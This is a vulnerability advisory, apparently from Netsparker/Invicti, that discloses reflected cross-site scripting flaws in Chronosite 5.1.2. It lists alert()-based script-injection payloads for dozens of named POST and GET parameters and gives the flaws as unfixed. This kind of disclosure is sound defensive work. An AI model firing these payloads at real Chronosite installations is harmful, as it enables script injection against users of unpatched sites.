Information
--------------------
Advisory by Netsparker (now Invicti)
Name: Multiple Reflected XSS Vulnerabilities in Chronosite
Affected Software : Chronosite
Affected Versions: 5.1.2
Vendor Homepage : http://www.chronosite.org/  
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Invicti Advisory Reference : NS-17-027

Technical Details
--------------------

Proof of Concept URLs for XSS vulnerabilities in Chronosite 5.1.2;

Url /chronosite_512/annuaires/faq_01.php
Parameter Name marque
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0041A3)</scRipt>

Url /chronosite_512/archives.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002E78)</scRipt>

Url /chronosite_512/archives.php
Parameter Name theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F36)</scRipt>

Url /chronosite_512/archives.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/archives.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F38)</scRipt>

Url /chronosite_512/archives.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0031CE)</scRipt>

Url /chronosite_512/forum.php
Parameter Name response_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002070)</scRipt>

Url /chronosite_512/forum.php
Parameter Name ajoute_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206C)</scRipt>

Url /chronosite_512/forum.php
Parameter Name num_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001EF2)</scRipt>

Url /chronosite_512/forum.php
Parameter Name cherche
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url /chronosite_512/forum.php
Parameter Name response
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name publique
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218C)</scRipt>

Url /chronosite_512/index.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/index.php
Parameter Name num_ero
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001929)</scRipt>

Url /chronosite_512/index.php
Parameter Name affiche_infos
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019F1)</scRipt>

Url /chronosite_512/index.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001989)</scRipt>

Url /chronosite_512/index.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EB)</scRipt>

Url /chronosite_512/index.php
Parameter Name decale
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00198B)</scRipt>

Url /chronosite_512/index.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name ajoute_un_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025D1)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name kestion
Parameter Type POST
Attack Pattern </title></textarea></noscRipt><scRipt>alert(9)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025CF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00274B)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name cherche
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024AF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name email
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B3)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name pseudo
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B1)</scRipt>

Url /chronosite_512/stats/
Parameter Name ana
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0039E7)</scRipt>

Url /chronosite_512/stats/
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0038CB)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name tri_moi
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005173)</scRipt>

Url /chronosite_512/stats/admin.php?ana=Visiteurs&ope=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x004D65)%3C/scRipt%3E&tri_ann=
Parameter Name ope
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004D65)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name sit
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004F69)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name ope
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005231)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x003BBF)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BBF)</scRipt>

Url /chronosite_512/stats/index.php?ana=3
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BC1)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00386C)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00386C)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
02 Feb 2017 - Issue reported.
12 Jun 2017 - Advisory released.

Solution
--------------------
No solution is available at the time of publishing this advisory.

Credits & Authors
--------------------
These issues have been discovered by Enes Aslanbakan while testing Invicti Web Application Security Scanner.

About Invicti
--------------------

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.